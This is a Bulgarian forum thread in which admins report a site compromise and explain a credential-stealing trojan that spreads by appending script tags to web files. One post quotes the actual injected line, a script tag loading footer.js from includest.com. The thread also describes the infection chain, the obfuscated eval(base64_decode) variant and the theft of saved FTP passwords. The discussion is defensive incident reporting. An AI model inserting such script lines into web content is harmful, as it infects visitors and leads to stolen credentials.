Май има някакъв проблем във форума...

Пишете за оплаквания, въпроси и/или предложения по форума. Или недейте...

Moderator: Moridin

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Tue Oct 11, 2011 11:14 pm

Имаше проблем във форума. Оправен е. Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас :)

Майтапът е, че не мога да намеря информация точно за такъв trojan, който да добавя на края на файловете <script src="http://includest.com/footer.js"></script> (НЕ кликайте на това, ако се показва като връзка; не е забавно :)). Виждал съм много подобни троянски коне, които по този начин прескачат от компютър към всички уебсайтове, до които собственикът на компютъра е имал достъп, оттам на компютрите на доста от посетителите и т.н.... но точно пък с includest.com не бях виждал.
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

User avatar
Xellos
Moderator
Posts: 20437
Joined: Fri Apr 02, 2004 10:08 pm

Post by Xellos » Tue Oct 11, 2011 11:15 pm

:yay:
„Dim dam talélam vacarme
S'en va dans Lumi éternam
Et Gustave dôme guardéam
Dilim dili lili lam
Lutece séra
Dolilom séram
Dim dim dam dada dim dim da dada dim da lilam
Dim dim dam dada dim dim da dada dam di didam”

User avatar
The Dragon
Elder God
Posts: 9062
Joined: Wed Jan 14, 2004 9:03 pm

Post by The Dragon » Tue Oct 11, 2011 11:44 pm

Roamer wrote:Имаше проблем във форума. Оправен е. Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас :)

Майтапът е, че не мога да намеря информация точно за такъв trojan, който да добавя на края на файловете <script src="http://includest.com/footer.js"></script> (НЕ кликайте на това, ако се показва като връзка; не е забавно :)). Виждал съм много подобни троянски коне, които по този начин прескачат от компютър към всички уебсайтове, до които собственикът на компютъра е имал достъп, оттам на компютрите на доста от посетителите и т.н.... но точно пък с includest.com не бях виждал.
Я обясни какъв точно е бил проблема?
The sinking of the Titanic was a miracle to the lobsters in the ship's kitchen.

User avatar
Moridin
Global Moderator
Posts: 19290
Joined: Fri Dec 19, 2003 10:21 pm
Location: On the other side
Contact:

Post by Moridin » Wed Oct 12, 2011 6:22 am

Ха, казах ти, Даниеле :Р
This is it. Ground zero.

User avatar
The Dragon
Elder God
Posts: 9062
Joined: Wed Jan 14, 2004 9:03 pm

Post by The Dragon » Wed Oct 12, 2011 11:52 am

Хммм
дава някакви неща в redone tag gz. кой го е пипал правил и защо :)
The sinking of the Titanic was a miracle to the lobsters in the ship's kitchen.

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Wed Oct 12, 2011 1:01 pm

Преди около година се появи нов клас троянски коне, които работят по следния начин:

1. В HTML, JS, PHP и т.н. файлове на някой уебсайт се появява още един ред, който понякога (като в този случай) е просто "<script src="http://blaaaa/something.js"></script>", а друг път е същото, ама силно obfuscate-нато - eval(base64_decode("GBFDJXDFHFGHDHFFHGBHDFH")) или нещо такова.

2. Браузърът на жертвата поглежда някой от променените HTML, JS, PHP и т.н. файлове, изпълнява този ред и тегли въпросния something.js.

3. Този something.js използва проблем в сигурността на браузъра, за да "пробие" до ниво достъп до локални файлове и да инсталира троянския кон върху компютъра на жертвата

4. Троянският кон периодично претърсва компютъра за инсталирани неща като CuteFTP, FileZilla, WinSCP и други такива FTP/SFTP клиенти и събира запазените usernames и пароли, като ги предава на някакъв централен сървър.

5. В един момент - понякога седмици или дори месеци след оригиналното заразяване - централният сървър казва на всичките си войничета "айде, ето ви тук username и парола за ей-тоя сървър, действайте!" - и една орда zombie minions от цял свят започват да се закачат за сървъра, теглят де що има HTML, PHP, JS и т.н. файлове - *и добавят <script src="..."> накрая!* :)

6. В следващия момент някой невинен клиент поглежда сайта, браузърът му вижда <script src="...">... и цикълът започва отново :)
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

User avatar
Marfa
Moderator
Posts: 11251
Joined: Sat Dec 20, 2003 10:12 pm
Contact:

Post by Marfa » Wed Oct 12, 2011 2:26 pm

Ъ... :shock: Ами аз на мойта FileZilla като имам 5-6 запазени юзърнейми и пароли?! Ко се прай в такива случаи?
This octopus! Let's give him boots, send him to North Korea!

Image<-Подробно описание на нещата, които ми образуват нерви :twisted:
Уук.

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Wed Oct 12, 2011 2:43 pm

Ако имаш подозрения, че през компютъра ти е минал такъв trojan, ЗАДЪЛЖИТЕЛНО сменяш ВСИЧКИ запазени пароли. Няма друг начин. Повярвай ми, борил съм се с такива trojans няколко пъти миналата година в Space.BG и в CNsys (и от клиенти, и от колеги, и изобщо)... няма друг начин.
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

User avatar
Marfa
Moderator
Posts: 11251
Joined: Sat Dec 20, 2003 10:12 pm
Contact:

Post by Marfa » Wed Oct 12, 2011 2:57 pm

OK! Веднага!
This octopus! Let's give him boots, send him to North Korea!

Image<-Подробно описание на нещата, които ми образуват нерви :twisted:
Уук.

bsb
Paragon
Posts: 640
Joined: Sun Dec 06, 2009 7:33 pm

Post by bsb » Wed Oct 12, 2011 3:05 pm

Не "веднага", а след като си проверила за вируси и си сигурна, че няма. Защото ако троянецът е активен, като си смениш паролите, той ще прехване и новите.

User avatar
Moridin
Global Moderator
Posts: 19290
Joined: Fri Dec 19, 2003 10:21 pm
Location: On the other side
Contact:

Post by Moridin » Wed Oct 12, 2011 3:15 pm

Съвсем вярно е всичко това (и го срещнах в няколко случая миналата година), но сега въпросът е как се изкоренява троянецът, едва ли можеш да изтриеш всички .js файлове от компа? :)

също така ми е интересно къде има инфо за цялото това, т.е. интересно ми е как точно джаваскрипт файлът успява да се изпълни и да рови из локалните данни на фтп сървърите.


edit: ааа моя грешка, всъщност троянецът вероятно си е някакво dll/so? имам подозрението, че антивирусните едва ли ще го хванат....
This is it. Ground zero.

User avatar
Xellos
Moderator
Posts: 20437
Joined: Fri Apr 02, 2004 10:08 pm

Post by Xellos » Wed Oct 12, 2011 4:09 pm

Напоследък антивирусните хващат главно и основно кракове за игри, и всяка различно вади :mrgreen: авирата не ми е пискала за нищичко от месеци реално.
„Dim dam talélam vacarme
S'en va dans Lumi éternam
Et Gustave dôme guardéam
Dilim dili lili lam
Lutece séra
Dolilom séram
Dim dim dam dada dim dim da dada dim da lilam
Dim dim dam dada dim dim da dada dam di didam”

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Wed Oct 12, 2011 4:53 pm

Всъщност е имало случаи антивирусни програми да хващат такива жувотни. Затова се чудя защо не мога да намеря информация конкретно за този (имам само URL-то, което той добавя в script, само по него търся), че да ви кажа по-конкретно точно кой е и с какво се чисти.
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

User avatar
Kolender
Farmer
Posts: 72
Joined: Fri Jun 13, 2008 3:57 pm

Post by Kolender » Wed Oct 12, 2011 5:05 pm

Ще помоля всички, които имат достъп до сайта чрез FTP, SFTP или нещо такова, да си проверят компютрите за вируси и троянски коне, защото е бил някой от нас
Това значи, че потенциалната опасност от троянския кон/вирус е за хората от екипа на Shadowdance. За другите потребители има ли опасност? Въпросът ми е мега тъп предполагам, но хич ме няма с материята.

User avatar
Roamer
Ascendent
Posts: 4895
Joined: Wed Jan 03, 2007 5:25 pm
Location: Hier ist hier und jetzt ist jetzt doch jetzt ist jetzt schon nicht mehr da...
Contact:

Post by Roamer » Wed Oct 12, 2011 5:31 pm

Хм. Истината е, че докато писах това, бях все още под впечатление от бързането да го оправя и бях съсредоточен върху причината и само част от резултатите (това, че форумът на практика не работеше твърде добре :)).

Да - всички, които са отваряли главната (или която и да е) страница на форума вчера, докато той не позволяваше login и още няколко неща не работеха, са потенциално засегнати от проблема. Ако браузърът ви е заредил footer.js, както пишеше в HTML-ите, може и да сте заразени. За съжаление все още не знам точно с какво :? :D
Eric: I use my sword to detect good on it.
Ed: It's not good, Eric. It's a gazebo.

Who is online

Users browsing this forum: No registered users and 1 guest